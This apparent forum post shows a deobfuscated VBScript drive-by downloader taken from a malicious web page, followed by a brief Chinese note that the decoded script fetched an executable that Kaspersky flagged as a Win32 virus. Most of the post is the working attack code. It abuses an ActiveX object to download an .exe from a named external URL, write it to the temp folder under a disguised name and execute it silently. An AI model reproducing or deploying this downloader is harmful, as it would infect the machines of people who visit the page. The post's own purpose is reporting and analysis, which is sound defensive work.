on error resume next dl = "http://www.ac66.cn/88/pp.exe" Set df = document.createElement("
object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.Create
Object(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.create
object(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="g0ld.com" set F = df.create
object("Scripting.FileSystem
Object","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.create
object("Shell.Application","") Q.ShellExecute fname1,"","","open",0
You DO it!
还原出来后的代码是这样的
下载了一个http://www.ac66.cn/88/pp.exe这个东西,卡巴报
已删除: 病毒 Packed.Win32.PePatch.dk (修改)
文件: C:\Documents and Settings\panwenshuai\Local Settings\Temporary Internet Files\Content.IE5\8TANKH6N\pp[1].exe/PE_Patch